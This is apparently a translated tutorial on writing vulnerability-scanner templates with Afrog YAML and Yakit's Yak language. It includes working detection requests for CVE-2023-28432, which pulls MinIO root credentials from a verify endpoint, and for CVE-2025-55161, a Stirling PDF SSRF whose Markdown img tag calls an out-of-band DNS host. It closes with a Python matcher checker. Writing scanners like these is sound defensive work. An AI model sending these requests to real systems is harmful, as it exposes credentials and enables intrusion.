Vulnerability Scanning Discovery - Web Services: PoC Development, Yakit Plugin Writing, Afrog Project, YAML Syntax, Yak Language, Receive & Match
Key points:
PoC development - remote vulnerability scanning - Afrog project & Yakit native syntax & template plugins
Demo cases - PoC development - remote vulnerability scanning - Afrog project & Yakit native syntax & template plugins
I. Afrog PoC development
Official PoC rule-writing guide: https://github.com/zan8in/afrog/wiki/Afrog-PoC-%E8%A7%84%E5%88%99%E7%BC%96%E5%86%99%E6%9D%83%E5%A8%81%E6%8C%87%E5%8D%97
1. MinIO cluster-mode information disclosure vulnerability (CVE-2023-28432)
Lab environment: https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432
Test: afrog.exe -t https://xx.xx.xx.xx:xxxx -P minio.yaml
id: CVE-2023-28432

info:
  name: My PoC demo1
  author: xiaodisec
  severity: critical

rules:
  r0:
    request:
      method: POST
      path: /minio/bootstrap/v1/verify
      headers:
        Content-Type: application/x-www-form-urlencoded
    # rule r0 matches when the bootstrap verify endpoint answers 200 and the body carries the root credential marker
    expression: response.status == 200 && response.body.bcontains(b'MINIO_ROOT_PASSWORD')

# the PoC reports a hit when rule r0 matched
expression: r0()

2. Stirling PDF SSRF vulnerability (CVE-2025-55161)
Test: afrog.exe -t https://xx.xx.xx.xx:xxxx -P SSRF.yaml --oob dnslogcn
id: CVE-2025-55161

info:
  name: My PoC demo2
  author: xiaodisec
  severity: critical

set:
  # random 6-character lowercase string, used as the uploaded file name
  username: randomLowercase(6)

rules:
  r0:
    request:
      method: POST
      path: /api/v1/convert/markdown/pdf
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK
      body: |-
        ------WebKitFormBoundaryvAfAbBmFpYrQfooK
        Content-Disposition: form-data; name="fileInput"; filename="{{username}}.md"
        Content-Type: application/octet-stream

        <img src='http://{{oob.DNS}}/'>
        ------WebKitFormBoundaryvAfAbBmFpYrQfooK--
    # rule r0 matches when the OOB service records a DNS lookup for the injected hostname (the second argument is the wait timeout)
    expression: oobCheck(oob.ProtocolDNS, 5)

expression: r0()

II. Yakit PoC plugin development
1. Based on Nuclei YAML syntax
Official PoC writing reference: https://www.yaklang.com/docs/security/cap8-4-yaml-poc
2. Based on the native Yak language (not recommended; this approach is more cumbersome)
loglevel(`info`)
yakit.AutoInitYakit()

// build and send the probe request; {{params(target)}} is filled in by poc.params below
sendPacket = func(target) {
    return poc.HTTP(`POST /minio/bootstrap/v1/verify HTTP/1.1
Host: {{params(target)}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

`, poc.params({"target": target}))
}

// the target comes from the plugin's command-line parameter
target = cli.String("target")
if target == "" {
    die("no target")
}

// marker that only appears in the response body of a vulnerable MinIO instance
result = "MINIO_ROOT_USER"
rsp, _, err = sendPacket(target)
die(err)

// split the raw response packet and match the marker against the body only
headers, body = str.SplitHTTPHeadersAndBodyFromPacket(rsp)
if str.MatchAllOfSubString(body, result) {
    // show a status card in Yakit ("发现漏洞" = vulnerability found)
    yakit.StatusCard("发现漏洞", target)
    log.info("find token: %v", result)
}
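Both the Afrog rule expressions in section I and the Yak plugin above come down to the same matcher: check the response status and look for a marker in the body. The following Python helper is an added example, not part of the page or of the afrog project: it evaluates the expression subset the page uses (response.status==N, response.body.bcontains(b'...'), &&, ||, !) against recorded responses, so a template's matcher can be checked against a vulnerable and a patched fixture before it is ever pointed at a host. MINIO_POC is a dict copy of the page's first rule and the fixture bodies are constructed.

```python
import re

# Constructed copy of the MinIO Afrog rule from the page, expressed as a dict
# instead of YAML so this runs without a YAML library (assumption: the request
# section is not replayed here, only the matcher is evaluated).
MINIO_POC = {
    "id": "CVE-2023-28432",
    "rules": {
        "r0": {
            "request": {"method": "POST", "path": "/minio/bootstrap/v1/verify"},
            "expression": "response.status==200 && response.body.bcontains(b'MINIO_ROOT_PASSWORD')",
        }
    },
    "expression": "r0()",
}

_STATUS = re.compile(r"response\.status\s*==\s*(\d+)")
_BCONTAINS = re.compile(r"response\.body\.bcontains\(b'([^']*)'\)")
_RULE_CALL = re.compile(r"(\w+)\(\)")


def _eval_atom(atom: str, status: int, body: bytes) -> bool:
    """Evaluate one comparison; supports '!' negation, no parentheses."""
    atom = atom.strip()
    negate = atom.startswith("!")
    if negate:
        atom = atom[1:].strip()
    if m := _STATUS.fullmatch(atom):
        value = status == int(m.group(1))
    elif m := _BCONTAINS.fullmatch(atom):
        value = m.group(1).encode() in body
    else:
        raise ValueError(f"unsupported expression atom: {atom!r}")
    return value != negate


def eval_rule_expression(expr: str, status: int, body: bytes) -> bool:
    """Evaluate the page's expression subset: atoms joined by && (binds
    tighter) and ||, applied to a recorded response (status, body)."""
    return any(all(_eval_atom(a, status, body) for a in clause.split("&&"))
               for clause in expr.split("||"))


def run_poc(poc: dict, responses: dict) -> bool:
    """Evaluate each rule against its recorded response (rule name -> (status, body)),
    then the top-level expression made of rule calls such as r0() && r1()."""
    results = {name: eval_rule_expression(rule["expression"], *responses[name])
               for name, rule in poc["rules"].items()}

    def rule_result(call: str) -> bool:
        m = _RULE_CALL.fullmatch(call.strip())
        if not m or m.group(1) not in results:
            raise ValueError(f"unknown rule call: {call!r}")
        return results[m.group(1)]

    return any(all(rule_result(c) for c in clause.split("&&"))
               for clause in poc["expression"].split("||"))
```

A matcher that fires on the patched fixture, or fails to fire on the vulnerable one, is a template bug that would otherwise only surface as false positives or missed findings in a real scan.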